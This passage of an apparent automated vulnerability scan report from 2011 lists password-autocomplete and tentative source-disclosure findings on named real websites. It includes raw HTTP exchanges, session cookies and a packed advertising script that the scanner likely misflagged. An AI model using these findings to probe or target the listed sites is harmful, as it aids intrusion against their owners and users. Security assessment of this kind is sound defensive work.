Set-Cookie: phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4; expires=Sun, 20-Feb-2028 00:50:59 GMT; path=/; domain=www.toofab.com
Vary: Accept-Encoding
Content-Length: 71853
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div class="commentbox">
<form id="comment-form" action="#commentform" name="commentform" method="post" data-fb="{perms:'publish_stream,user_likes'}">
   <!--
   <div id="cmttabs">
...[SNIP]...
<br />
           <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/><br />
...[SNIP]...

13.34. http://www.usenetbinaries.com/l/newsgroups.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.usenetbinaries.com
Path:   /l/newsgroups.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /l/newsgroups.html?r=aw;kw=usenet&gclid=CLHh78_AoqsCFRRSgwod8HVslQ HTTP/1.1
Host: www.usenetbinaries.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:26 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 6237

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<title>
Newsgroups - Usenet Binaries Dot Com
</title>

<meta name="keywords" con
...[SNIP]...
<td id="trail">
       <form action="http://www.usenetbinaries.com/login" method="post" id="topsearch" align="left" display="inline">
       <FONT SIZE=1 COLOR=#333333>
...[SNIP]...
<input type="text" name="UB_USERNAME" size="20">
       password<input type="password" name="UB_PASSWORD" id="topquery" value="Password" size="20">
       </FONT>
...[SNIP]...

13.35. http://www.usenetserver.com/en/support.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.usenetserver.com
Path:   /en/support.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en/support.php HTTP/1.1
Host: www.usenetserver.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:36:29 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Fri, 23 Sep 2011 19:36:29 GMT
Content-Type: text/html
Content-Length: 21338


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- BEGIN Google Website
...[SNIP]...
<td class="line">
   <form action="https://accounts.usenetserver.com/view/index.php" name="log" method="POST">

               <input type='hidden' name="goto" value="">
...[SNIP]...
<td><input name="password" type="password" value="*******" style="width:100px;" onclick="this.value='';" /></td>
...[SNIP]...

14. Source code disclosure  previous  next
There are 7 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


14.1. http://info.mailtraq.com/v/js/ncBwHlpr.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://info.mailtraq.com
Path:   /v/js/ncBwHlpr.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /v/js/ncBwHlpr.js HTTP/1.1
Host: info.mailtraq.com
Proxy-Connection: keep-alive
Referer: http://info.mailtraq.com/imap
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1583-query=; 1583%2Duserid=%2D3830349; 1583%2Dreferer=http%3A%2F%2Fduckduckgo%2Ecom%2F%3Fq%3Dimap%2Bserver; ASPSESSIONIDQQSDCQTS=EJBHPKFBKMPAIDFPJELDBDIJ

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 08 Aug 2011 13:23:48 GMT
Accept-Ranges: bytes
ETag: "4851f367ce55cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:42:31 GMT
Content-Length: 65835

var ncMenus={LinkTypeNormal:0,LinkTypeHeading1:1,LinkTypeHeading2:2,GetLinkCssSelector:function(p_lZoneId, p_lLinkType, p_bSelected){var sTemp='.LO';switch(p_lLinkType){case ncMenus.LinkTypeNormal:sTe
...[SNIP]...
<![CDATA["+pNode.nodeValue+"]]>"; break; case 7: xml="<?"+pNode.nodevalue+"?>"; break; case 8: xml="<!--"+pNode.nodevalue+"-->
...[SNIP]...

14.2. http://resources.infolinks.com/js/221.3.5b/infolinks.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://resources.infolinks.com
Path:   /js/221.3.5b/infolinks.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/221.3.5b/infolinks.js HTTP/1.1
Host: resources.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=0

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 00:51:01 GMT
ETag: "810668-14ca5-4ace66896a000+gzip"
Expires: Mon, 17 Oct 2011 00:51:01 GMT
Last-Modified: Wed, 14 Sep 2011 13:05:04 GMT
Server: ECS (sjo/522C)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 85157

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e)
...[SNIP]...
","1I"],d8:"6k",fQ:"bD",4N:"bE",7t:"bE",8J:"6k",8E:["2H","1p"]},72:{},2c:{},db:50,di:{75:0,3G:10,6F:10,8G:50,7j:30,78:0},7I:[],5g:[],aZ:{},fz:"2J://8n.5Y.6X/?kN=bb&nT=fJ",d7:"2J://8n.5Y.6X/kQ-42.6r?6u=<%= 7B %>&4j=<%= 4j %>",1X:{97:1e,9x:kR,9w:nK,cG:"4T",9y:4Z,id:"kS",7Z:1m,1z:1e,3W:1e,2i:1e}});o.1b={};o.2s(o.1b,{1u:{1v:{$:k(A){l 1h.6n(A)},55:k(D,C){j A=o.1T;if(!D){l 1e}if(!C){C={}}1l(j B in C){if(C[B]!=1e){if((B=="c5"||
...[SNIP]...
<%=(.*?)%>/g,"\',$1,\'").2n("<%").1t("\');").2n("%>").1t("o.1R(p,\'");F=["j p=[];lu(46||{}){o.1R(p,\'",F,"\');}l p.1t(\'\');"].1t("");D=1Y e6("46",F);if(C){H[C]=D}}l D(G)},3V:{3Z:k(){l 1Y 3r().3t()},9H:k(B,A){l(A||o.1b.3V.3Z())-B}},6c:{g9:k(){j A=o,E=A
...[SNIP]...
<1i 1F="9k"                1a="1g:<%= 1g %>px; 1d:<%= 1d %>px;">            <2M 2h="dO<%= id %>3T<%= aJ %>3T<%= 4X %>" 3B="<%= 1C %>" aI="o.aM(\\\'<%= id %>\\\')" 1g="<%= 1g %>" cP="no" 1d="<%= 1d %>" aX="0" j3="1n" j4="0" j6="0" j7="0" j9="0"></2M>            <% if (2d){ %>                <5E 5z="8W" 3F="<%= 5h %>" 4K="dO<%= id %>3T<%= aJ %>3T<%= 4X %>" 1a="1A:1I;">                    <3p 1K="2N" 2h="5h" 2v="<%= 3K(2d.2n(\\\'\\\').hI().1t(\\\'\\\')) %>" />                    <3p 1K="2N" 2h="6u" 2v="<%= 7B %>" />                    <3p 1K="2N" 2h="4j" 2v="<%= 4j %>" />                    <3p 1K="2N" 2h="4G" 2v="<%= 4G %>" />
...[SNIP]...
<1i id="<%= id %>6D<%= 4D %>" 1F="<%= 1s %>" 1a="5P:bo 6W 0 <%= 4I ? 6 : 15 %>px; 1d:<%= 1q.1d-15 %>px; 1w:6Z; 1A:<%= 1A %>;">    <1i 1F="<%= 1s %>" 1a="5P:0 0 5c <%= 4I ? 9 : 0 %>px; 1d:gS;">        <1i 1F="<%= 1s %>" 1a="1d:gS; gY-1d:oC; 2D-5B:8R; 2D-5Z:af; 1W-6a:1I; 2w: <%= 1Q.5R %>; 2D-ae:cK ag, 96, ah-92; 1A:oE-oI; cu-6p:1o;"><%= ad.5R %></1i>    </1i>    <%if (hr){ %>        <% if(2Y.4r.4p()){ %>            <8p id="<%= id %>gW" 1F="<%= 1s %>" 1a="7p:1p; 5k-1g:cz; 1d:cB; 1A:3c; 3b:5b 3O <%= 1Q.9U %>; 5P-2H:a4; <%= 2Y.7K(\\\'0 0 6W 0 \\\' + 1Q.gZ) %>" 3B="<%= 6z %>" a7=""/>        <% } 1f { %>            <1i 1F="<%= 1s %>" 1a="7p:1p; 1g:cz; 1d:cB; 4z:2K; 5P:-6P 5M 0 <%= 4I ? 0 : -9 %>px; 1H:1C(<%= 2V %>3E.<%= 5O %>) no-2j 2z 0 0 2f;">
...[SNIP]...
<8p id="<%= id %>gW" 1F="<%= 1s %>" 1a="<% if(!4I){ %>5k-<% } %>1g:cz; 1d:cB; 1W-6p:5m;" 3B="<%= 6z %>" a7=""/>
...[SNIP]...
<1i 1F="<%= 1s %>" 1a="aa:2N; 1d:oS; gY-1d:cE; 2D-5B:2K; 1W-6a:1I; 2w:<%= 1Q.1W %>; 2D-5Z:af;"><%= ad.1W %></1i>    <1i 1F="<%= 1s %>" 1a="<%= 26 %> 2Q:2K; 1p:<%= 4I ? 9 : 0 %>px; 1g:p1; 1d:6v; aa:2N; 2D-5B:2K; 2D-5Z:af; 1W-6a:2T; 2w:<%= 1Q.f8 %>;" 5R="<%= ad.cH %>"><%= ad.cH %></1i>    <1i 1F="<%= 1s %> <%= id %>6o <%= id %>p9" 1a="<%= 26 %> 2Q:bo; 2H:0; 1g:pb; 1d:pd; 4z-1o:5M; 1H-2j:2j-x !1L; 3b:1S 3O <%= 1Q.fd %>; <%= 2Y.89(\\\'5M\\\') %> 1W-6p:5m; 2w:<%= 1Q.fg %>; 2D-5B:2K; 33:3k; 2D-5Z:af;" 3X="o.1b.1u.1a.hh(1k, \\\'d0\\\');" 3P="o.1b.1u.1a.hj(1k, \\\'d0\\\');">
...[SNIP]...
<1i                 id="<%= id %>6D<%= 4D %>" 1F="<%= 1s %>" 1a="1d:<%= 1q.1d %>px; 1w:6Z; 1A:<%= 1A %>;"><%= 2d %></1i>
...[SNIP]...
<1i                 id="<%= id %>6D<%= 4D %>" 1F="<%= 1s %>" 1a="1A:<%= 1A %>;">    <1i 1s="<%= 1s %>" 1a="1g:<%= 1q.1g %>px; 1d:<%= 1q.1d %>px;">        <2M id="al<%= 4D %>" 2h="al<%= 4D %>" 3B="<%= 1N.8u %>" 1g="<%= 1q.1g %>" 1d="<%= 1q.1d %>" aX="0" cP="no">
...[SNIP]...
<5E id="<%= id %>hx<%= 4D %>" 5z="8W" 3F="2J://<%= 1N.7M %>/5h.5x" 4K="al<%= 4D %>" 1a="1A:1I;">        <3p 1K="2N" 2h="5h" 2v="<%= 3K(2d.2n(\\\'\\\').hI().1t(\\\'\\\')) %>" />        <3p 1K="2N" 2h="6u" 2v="<%= 1N.6N %>" />        <3p 1K="2N" 2h="4j" 2v="<%= 1N.6S %>" />        <3p 1K="2N" 2h="4G" 2v="<%= 1N.4h %>" />
...[SNIP]...
<1i id="<%= id %>" 1F="<%= 1s %>" 1a="<%= 26 %> 1o:<%= 1y.2O.1o %>px; 1p:<%= 1y.2O.1p %>px; 1g:<%= 1g+12 %>px; 1d:<%= 1d + (4I ? 58 : 54) %>px; z-3h:<%= 3x+3 %>;">    <1i id="<%= id %>eq" 1F="<%= 1s %>" 1a="<%= 26 %> 1o:<%= oY == \\\'T\\\' ? 0 : \\\'2K\\\' %>; 1p:0; 1g:<%= 1g+10 %>px; 1d:<%= 1d+39 %>px; 3b:1S 3O <%= 1Q.gf %>; <%= 2Y.89(\\\'5u\\\') %> <% if (2Y.4r.9v()){ %>1H-2w:<%= 1Q.9U %>; <%= 2Y.aA(oY == \\\'T\\\' ? \\\'2Q\\\' : \\\'1o\\\', (oY == \\\'T\\\' && 27(b.4L) >= 8M) ? 1d+19 : 22, 1Q.gk, 1Q.gn) %><% } 1f { %>1H:1C(<%= 2V %>2Z-cc-bg.<%= 5O %>) 2j-x 2z 0 <%= oY == \\\'T\\\' ? 1d+19+\\\'px\\\' : \\\'-82\\\' %> <%= 1Q.9U %>;<% } %> <%= 2Y.7K(\\\'0 0 bk 0 #co\\\') %>" 3X="o.7n(\\\'<%= 1y.id %>\\\').ct(1k, \\\'<%= 1y.id %>\\\');" 3P="o.7n(\\\'<%= 1y.id %>\\\').bI(1k, \\\'<%= 1y.id %>\\\');">        <1i id="<%= id %>dK" 1F="<%= 1s %>" 1a="1g: 2X%; 1d: o5; <%= 26 %> <%= oY == \\\'T\\\' ? \\\'2Q:0;\\\' : \\\'1o: 0;\\\' %> 1p: 0; z-3h: <%= 3x+4 %>;">            <a id="<%= id %>o7" 1F="<%= 1s %> <% if (!62.1C){ %><%= id %>6o<% } %>" 4a="<%= 62.bp %>" 4K="aq" 1a="<%= 26 %> 1A: 3c; 1o: 6l; 1p: 6W; 1g:<%= 62.1g %>px; 1d:<%= 62.1d %>px; 33: 3k; <% if (62.1C){ %>1H:1C(<%= 62.1C %>) no-2j 2z 0 0 2f !1L;<% } %>
...[SNIP]...
</a>            <% if (1j 1N.57 == "3H"){ %> <a 1a="1w: 4e; 1o: 5c; 2H: gX; 1d: cE; 2D-5Z: 87; 2D-ae: cK ag,96,ah-92; 2D-5B: 6W; 1W-6a: 2T; 2w: #oj;" 1F="9k" 4a="2J://8n.5Y.6X/2g" 4K="aq">
...[SNIP]...
</4b> <% }/*oP*/ %> <1i id="<%= id %>oQ" 1F="<%= 1s %>" 1a="<%= 26 %> 1o: 6P; 2H: <%= (1j 1N.57 != "3H") ? "gX" : "cm" %>; 1d: cE; 2D-5Z: 87; 2D-ae:cK ag, 96, ah-92; 2w:<%= 1Q.cS %>; 2D-5B: 6P;"><%= 1q.2g[1y.2S].cS || \\\'py\\\' %></1i>            <% if (2Y.4r.8x()){ %>            <a id="<%= id %>hN" 1F="<%= 1s %> <%= id %>6o" 4a="<%= bf %>" 4K="aq" 1a="<%= 26 %> 1o:5c; 2H:hP; 1g:2K; 1d:2K; 1A:3c; 1H-1w:0 -ay !1L; 3b:1S 3O <%= 1Q.8y %>; <%= 2Y.89(\\\'5c\\\') %> <%= 2Y.7K(\\\'0 -1S 1S 0 \\\' + 1Q.cV) %>" 3X="1k.1a.5N=\\\'<%= 1Q.cW %>\\\';" 3P="1k.1a.5N = \\\'<%= 1Q.8y %>\\\';"></a>            <1i id="<%= id %>aR" 1F="<%= 1s %> <%= id %>6o" 1a="<%= 26 %> 1o:5c; 2H:5u; 1g:2K; 1d:2K; 33:3k; 1H-1w:-2K -ay !1L; 3b:1S 3O <%= 1Q.8y %>; <%= 2Y.89(\\\'5c\\\') %> <%= 2Y.7K(\\\'0 -1S 1S 0 \\\' + 1Q.cV) %>" 43="o.1x.9h(29, \\\'<%= 1y.id %>\\\')" 3X="1k.1a.5N=\\\'<%= 1Q.cW %>\\\';" 3P="1k.1a.5N = \\\'<%= 1Q.8y %>\\\';"></1i>            <% } 1f { %>            <a id="<%= id %>hN" 1F="<%= 1s %>" 4a="<%= bf %>" 4K="aq" 1a="<%= 26 %> 1o: 5X; 2H: hP; 1g: 6v; 1d: 6v; 1A: 3c; 1H: 1C(<%= 2V %>cQ-aC.<%= 5O %>) no-2j 2z 0 0 2f; 33: 3k;" 3X="1k.1a.2E=\\\'0 -6v\\\';" 3P="1k.1a.2E = \\\'0 0\\\';">
...[SNIP]...
<1i 1F="<%= 1s %> <%= id %>6o" 1a="<%= 26 %>
...[SNIP]...
<1i id="<%= id %>aR" 1F="<%= 1s %>" 1a="<%= 26 %> 1o: 5X; 2H: 5u; 1g: 6v; 1d: 6v; 33:3k; 1H: 1C(<%= 2V %>cQ-aC.<%= 5O %>) no-2j 2z 0 0 2f;" 43="o.1x.9h(29, \\\'<%= 1y.id %>\\\')" 3X="1k.1a.2E=\\\'0 -6v\\\';" 3P="1k.1a.2E = \\\'0 0\\\';">
...[SNIP]...
<1i 1F="<%= 1s %> <%= id %>6o" 1a="<%= 26 %>
...[SNIP]...
<1i id="<%= id %>7v" 1F="<%= 1s %>" 1a="<%= 26 %> 1o:<%= oY == \\\'T\\\' ? 4 : 34 %>px; 1p:5b; 1g:<%= 1g %>px; 1d:<%= 1d %>px; 2w:<%= 1Q.1W %>; 33: 3k; 3b:1S 3O <%= 1Q.dk %>; <% if (2Y.4r.9v()){ %><%= 2Y.aA(oY == \\\'T\\\' ? \\\'2Q\\\' : \\\'1o\\\', (oY == \\\'T\\\' && 27(b.4L) >= 8M) ? 1d-41 : 41, 1Q.dv, 1Q.dy) %><% } 1f { %>1H:1C(<%= 2V %>2Z-1O-bg.<%= 5O %>) 2j-x 2z 0 <%= oY == \\\'T\\\' ? 1d-41 : -41 %>px 2f;<% } %>" 43="o.6H(29, \\\'<%= 1y.id %>\\\');">            <%= il.bP(1y, 1q) %>        </1i>    </1i>    <% if (!1y.2l){ %>    <1i id="<%= id %>iQ" 1F="<%= 1s %> <%= id %>6o" 1a="<%= 26 %> 1g: 8R; 1d: 8R; z-3h: <%= 3x+5 %>; 1H-1w:<%= oY == \\\'T\\\' ? \\\'-8R -dJ\\\' : \\\'0 -dJ\\\' %> !1L; 1o:<%= oY == \\\'T\\\' ? 1d+39 : 0 %>px; <%= oX == \\\'L\\\' ? \\\'2H: 24\\\' : \\\'1p: 24\\\' %>px;"></1i>    <% } %></1i><% if (!2Y.4r.4p() && (!b.1G || 3l(b.1G) >= 7)){ %><1i id="<%= id %>c4" 1F="<%= 1s %>" 1a="<%= 26 %> 1o:<%= 1y.2O.1o - (oY == \\\'T\\\' ? 37 : 24) %>px; 1p:<%= 1y.2O.1p-37 %>px; 1g:<%= 1g+10+74 %>px; 1d:<%= 1d+39+74 %>px; z-3h:<%= 3x+1 %>;" <% if (b.4g && 3l(b.4g) < 3.5){ %> 3X="o.7n(\\\'<%= 1y.id %>\\\').ct(1k, \\\'<%= 1y.id %>\\\');" 3P="o.7n(\\\'<%= 1y.id %>\\\').bI(1k, \\\'<%= 1y.id %>\\\');"<% } %>
...[SNIP]...
<1i id="<%= id %>jO" 1F="<%= 1s %>" 1a="<%= 26 %> 1o:0; 1p:0; 1g:4s; 1d:8Z; 1H:1C(<%= 2V %>3E.2U) no-2j 2z 0 -8L 2f;">
...[SNIP]...
<1i id="<%= id %>jT" 1F="<%= 1s %>" 1a="<%= 26 %> 1o:0; 1p:4s; 1g:<%= 1g+10-60 %>px; 1d:6I; 1H:1C(<%= 2V %>3E-h.2U) 2j-x 2z 0 0 2f;">
...[SNIP]...
<1i id="<%= id %>jX" 1F="<%= 1s %>" 1a="<%= 26 %> 1o:0; 2H:0; 1g:ax; 1d:8Z; 1H:1C(<%= 2V %>3E.2U) no-2j 2z -4s -8L 2f;">
...[SNIP]...
<1i id="<%= id %>k3" 1F="<%= 1s %>" 1a="<%= 26 %> 1o:8Z; 1p:0; 1g:6I; 1d:<%= 1d+39-61 %>px; 1H:1C(<%= 2V %>3E-v.2U) 2j-y 2z 0 0 2f;">
...[SNIP]...
<1i id="<%= id %>k6" 1F="<%= 1s %>" 1a="<%= 26 %> 1o:8Z; 2H:0; 1g:6I; 1d:<%= 1d+39-61 %>px; 1H:1C(<%= 2V %>3E-v.2U) 2j-y 2z -9g 0 2f;">
...[SNIP]...
<1i id="<%= id %>kk" 1F="<%= 1s %>" 1a="<%= 26 %> 2Q:0; 1p:0; 1g:4s; 1d:ax; 1H:1C(<%= 2V %>3E.2U) no-2j 2z 0 -a8 2f;">
...[SNIP]...
<1i id="<%= id %>kn" 1F="<%= 1s %>" 1a="<%= 26 %> 2Q:0; 1p:4s; 1g:<%= 1g+10-60 %>px; 1d:6I; 1H:1C(<%= 2V %>3E-h.2U) 2j-x 2z 0 -9g 2f;">
...[SNIP]...
<1i id="<%= id %>kw" 1F="<%= 1s %>" 1a="<%= 26 %> 2Q:0; 2H:0; 1g:ax; 1d:ax; 1H:1C(<%= 2V %>3E.2U) no-2j 2z -4s -a8 2f;">
...[SNIP]...
<1i id="<%= id %>hk" 1F="<%= 1s %>" 1a="<%= 26 %> 1o:<%= 7S.1o %>px; 1p:<%= 7S.1p %>px; 1g:<%= 7S.1g %>px; 1d:<%= 7S.1d %>px; z-3h:<%= 3x+6 %>; 33:3k;" 3X="o.81(29, \\\'<%= 1y.id %>\\\');" 3P="o.7x(\\\'<%= 1y.id %>\\\');" 43="o.6H(29, \\\'<%= 1y.id %>\\\')">
...[SNIP]...
<1i                id=\\"<%= id %>\\" 1F=\\"<%= 1s %>\\" 1a=\\"<%= 26 %> 1g:<%= 1g+11 %>px; 1d:<%= 1d+22 %>px; 1o:<%= 1y.2O.1o %>px; 1p:<%= 1y.2O.1p %>px; z-3h:<%= 3x+3 %>;\\"                3X=\\"o.cL(\'<%= 1y.id %>\')\\" 3P=\\"o.7x(\'<%= 1y.id %>\')\\">                    <% if (!1y.2l){ %>                    <1i id=\\"<%= id %>dK\\" 1F=\\"<%= 1s %>\\" 1a=\\"1g:2X%; 1d:82; <%= 26 %> 1p:0; z-3h:<%= 3x+4 %>; <%= (oY == \'T\') ? \'2Q:0;\' : \'1o:0;\' %>\\" >                        <1i id=\\"<%= id %>aR\\" 1F=\\"<%= 1s %>\\" 1a=\\"<%= 26 %> 1g:82; 1d:82; 1H:2f 1C(<%= 2V + (4I ? \'x.5t\' : \'x.2U\') %>) no-2j 2z 0 0; 33:3k; 1o:<%= (oY == \'T\') ? \'1P\' : 0 %>; <%= (oX == \'L\') ? \'2H:0\' : \'1p:0\' %>;\\" 43=\\"o.1x.9h(29, \'<%= 1y.id %>\')\\">
...[SNIP]...
<1i id=\\"<%= id %>eq\\" 1F=\\"<%= 1s %>\\" 1a=\\"<%= 26%> 1g:<%= 1g %>px; 1d:<%= 1d %>px; ld:<%= 3x+3 %>; 1o:<%= (oY == \'T\') ? 0 : \'82\' %>; <%= (oX == \'L\') ? \'1p:0\' : \'1p:bo;\' %>; \\">                        <1i id=\\"<%= id %>7v\\" 1F=\\"<%= 1s %>\\" 1a=\\"<%= 26 %> 1o:0; 1p:0; 1g:<%= 1g %>px; 1d:<%= 1d %>px; 33:3k; 2w:<%= 6U %>;\\" 43=\\"o.6H(29, \'<%= 1y.id %>\')\\">                            <%= o.bP(1y, 1q) %>                        </1i>
...[SNIP]...

14.3. http://resources.infolinks.com/js/222.0.4/infolinks.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://resources.infolinks.com
Path:   /js/222.0.4/infolinks.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/222.0.4/infolinks.js HTTP/1.1
Host: resources.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 00:50:37 GMT
ETag: "8105d6-14c9d-4ace66896a000+gzip"
Expires: Mon, 17 Oct 2011 00:50:37 GMT
Last-Modified: Wed, 14 Sep 2011 13:05:04 GMT
Server: ECS (sjo/5229)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 85149

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e)
...[SNIP]...
","1I"],d6:"5V",fR:"bD",4N:"aB",6G:"aB",8I:"5V",8E:["2I","1p"]},6J:{},2b:{},db:50,di:{7e:0,3H:10,6F:10,8G:50,72:30,78:0},7K:[],51:[],cJ:{},fy:"2J://8l.6s.71/?kP=bb&nU=fK",d5:"2J://8l.6s.71/kS-47.6r?6q=<%= 7E %>&4p=<%= 4p %>",1Y:{9c:1e,9x:kT,9y:nL,cx:"4U",9E:55,id:"kU",7B:1m,1z:1e,3Y:1e,2i:1e}});o.1b={};o.2q(o.1b,{1u:{1v:{$:l(A){k 1g.5T(A)},4S:l(D,C){j A=o.1U;if(!D){k 1e}if(!C){C={}}1l(j B in C){if(C[B]!=1e){if((B=="c8"||
...[SNIP]...
<%=(.*?)%>/g,"\',$1,\'").2j("<%").1s("\');").2j("%>").1s("o.1R(p,\'");F=["j p=[];kJ(43||{}){o.1R(p,\'",F,"\');}k p.1s(\'\');"].1s("");D=1X e6("43",F);if(C){H[C]=D}}k D(G)},3L:{4d:l(){k 1X 3w().3p()},9I:l(B,A){k(A||o.1b.3L.4d())-B}},5n:{g9:l(){j A=o,E=A
...[SNIP]...
<1j 1F="9m"                1a="1h:<%= 1h %>px; 1d:<%= 1d %>px;">            <2R 2h="dO<%= id %>3G<%= aJ %>3G<%= 57 %>" 3C="<%= 1C %>" aI="o.aM(\\\'<%= id %>\\\')" 1h="<%= 1h %>" cN="no" 1d="<%= 1d %>" cM="0" j4="1n" j5="0" j7="0" j8="0" ja="0"></2R>            <% if (29){ %>                <5K 5A="8X" 3B="<%= 5B %>" 4J="dO<%= id %>3G<%= aJ %>3G<%= 57 %>
...[SNIP]...
<3r 1K="2Q" 2h="5B" 2w="<%= 3W(29.2j(\\\'\\\').hI().1s(\\\'\\\')) %>" />                    <3r 1K="2Q" 2h="6q" 2w="<%= 7E %>" />                    <3r 1K="2Q" 2h="4p" 2w="<%= 4p %>" />                    <3r 1K="2Q" 2h="4D" 2w="<%= 4D %>" />
...[SNIP]...
<1j id="<%= id %>6B<%= 4r %>" 1F="<%= 1t %>" 1a="6a:bn 6Z 0 <%= 4F ? 6 : 15 %>px; 1d:<%= 1q.1d-15 %>px; 1w:7t; 1A:<%= 1A %>;">    <1j 1F="<%= 1t %>" 1a="6a:0 0 56 <%= 4F ? 9 : 0 %>px; 1d:gV;">        <1j 1F="<%= 1t %>" 1a="1d:gV; h7-1d:oD; 2B-5t:98; 2B-5R:ai; 1W-6f:1I; 2v: <%= 1Q.6x %>; 2B-ag:cH ah, 9b, 94-99; 1A:oG-oK; cq-6i:1o;"><%= ad.6x %></1j>    </1j>    <%if (hs){ %>        <% if(33.4E.4h()){ %>            <7X id="<%= id %>gY" 1F="<%= 1t %>" 1a="7p:1p; 5v-1h:cy; 1d:cA; 1A:35; 32:5b 3P <%= 1Q.9s %>; 6a-2I:a4; <%= 33.7M(\\\'0 0 6Z 0 \\\' + 1Q.h8) %>" 3C="<%= 6h %>" a9=""/>        <% } 1f { %>            <1j 1F="<%= 1t %>" 1a="7p:1p; 1h:cy; 1d:cA; 4I:2H; 6a:-7k 5u 0 <%= 4F ? 0 : -9 %>px; 1H:1C(<%= 2T %>3x.<%= 5P %>) no-2m 2z 0 0 2e;">
...[SNIP]...
<7X id="<%= id %>gY" 1F="<%= 1t %>" 1a="<% if(!4F){ %>5v-<% } %>1h:cy; 1d:cA; 1W-6i:5o;" 3C="<%= 6h %>" a9=""/>
...[SNIP]...
